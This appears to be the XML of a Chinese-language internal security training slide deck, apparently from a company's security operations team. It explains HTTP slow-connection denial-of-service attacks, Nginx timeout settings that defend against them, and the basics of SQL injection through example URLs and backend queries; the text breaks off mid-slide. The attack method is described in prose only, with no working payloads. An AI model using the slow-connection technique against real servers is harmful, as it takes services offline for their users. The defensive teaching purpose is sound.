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9B79B-BD5C-43F9-A26E-B39FADC068D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14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9B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400169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9B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292511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9B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292012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9B79B-BD5C-43F9-A26E-B39FADC068D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06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69B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38595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69B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293907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769B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308194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769B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285760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C4FD35-EC7F-48C8-8444-1DCB1D14AF1D}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/9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69B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184879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EC4FD35-EC7F-48C8-8444-1DCB1D14AF1D}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/9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69B79B-BD5C-43F9-A26E-B39FADC068D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33393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C4FD35-EC7F-48C8-8444-1DCB1D14AF1D}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/11/9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69B79B-BD5C-43F9-A26E-B39FADC068D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217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nginx.org/en/docs/http/ngx_http_core_module.html?&amp;_ga=1.79331604.1661961282.1452424317#client_header_timeout" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nginx.org/en/docs/http/ngx_http_core_module.html?&amp;_ga=1.36931872.1661961282.1452424317#client_body_timeou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baidu.com/?name=ixianl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mysql.com/doc/refman/5.7/en/sql-syntax-prepared-statement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liuyanfang@ixianlai.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:xudong@ixianla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nginx.org/en/docs/http/ngx_http_limit_conn_module.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nginx.org/en/docs/http/ngx_http_limit_req_modul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AB69B-4826-4249-BD6F-FDC4636F289B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机网络与安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD4BF89-1D43-4ABD-88AC-89961D771A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323986" y="4325112"/>
            <a:ext cx="10058400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全运维部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>徐东</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188168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6B777-05D0-4DC3-A9B2-3EAADB32D2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慢连接攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9E8C53C-FF5E-44A0-B209-A769DA22CBB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>对一个开放了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>访问的服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>服务器，先建立一个连接，指定一个比较大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>content-length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，然后以非常低的速度发包，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>1-10s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>发一个字节，然后维持住这个连接不断开。如果客户端持续建立这样的连接，那么服务器上可用的连接将一点一点被占满，从而导致拒绝服务。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>在客户端以单线程方式建立较大数量的无用连接，并保持持续发包的代价非常的低廉。实际试验中一台普通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>可以建立的连接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>3000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>个以上。这对一台普通的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，将是致命的打击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417773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FF219-4318-4217-BA5E-65AB590137BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慢发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://blog.nsfocus.net/wp-content/uploads/2015/07/image0012.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B450EFE-4499-4440-9838-53E6EE072A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5118" y="1737360"/>
            <a:ext cx="86106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log.nsfocus.net/wp-content/uploads/2015/07/image0022.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A799168-CA9C-4102-B5BA-237DC3A0E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118" y="3943350"/>
            <a:ext cx="66294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91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38E7B-DC57-44B2-9DB1-12212DE78D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慢发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP Body</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://blog.nsfocus.net/wp-content/uploads/2015/07/image0032.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A8A57AD-921D-4930-A4D2-118646CFE7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2393" y="1737360"/>
            <a:ext cx="68103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blog.nsfocus.net/wp-content/uploads/2015/07/image0042.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3B5E31-9928-4358-BAAE-60D4589A2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393" y="4090035"/>
            <a:ext cx="70008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64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ADEC5-B6CA-4895-8E08-3CEBA74DE65A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慢收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP Response</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://blog.nsfocus.net/wp-content/uploads/2015/07/image0052.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029F9644-616D-4485-9E73-8DED7B255C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5509" y="1737360"/>
            <a:ext cx="10058400" cy="24722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nsfocus.net/wp-content/uploads/2015/07/image0062.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1516D20B-0838-4128-885E-58CEE09C8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509" y="4209658"/>
            <a:ext cx="5179146"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35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5150F-0D80-4ACB-B826-A213076216BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抵御慢速攻击的配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00E9F483-503F-43DD-A645-880AFE65B668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>限制读取请求体超时。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>client_body_timeout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>限制读取请求头超时。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>client_header_timeout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290541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B874E-CF9B-4ADC-AE5D-21B470554654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8030E6F-01D8-440B-B47F-D2B652A7881D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入攻击是黑客对数据库进行攻击的常用手段之一。此类公告及非常危险，一旦被攻击就有可能导致数据泄漏，甚至数据被篡改甚至删除的危险。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198756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01AF7-8C90-47B7-9FFD-D415B1E36FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入过程分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E02CD6-E38D-4DD0-B239-4129303AD703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>注入肯定发生在动态页面中。一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的特征为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>        数字型参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>http://www.baidu.com?id=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>字符串型参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.baidu.com?name=ixianlai</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186912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62DEF-CD90-4A15-A749-F05488792BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入过程分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06E49B2-3726-4FE0-867C-4A198C2B0EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>我们可以猜测后台执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>语句为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select * from blog where id=123;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        select * from blog where name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ixianlai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895992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D1E12-F04B-475F-91B5-FD6D7C809116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
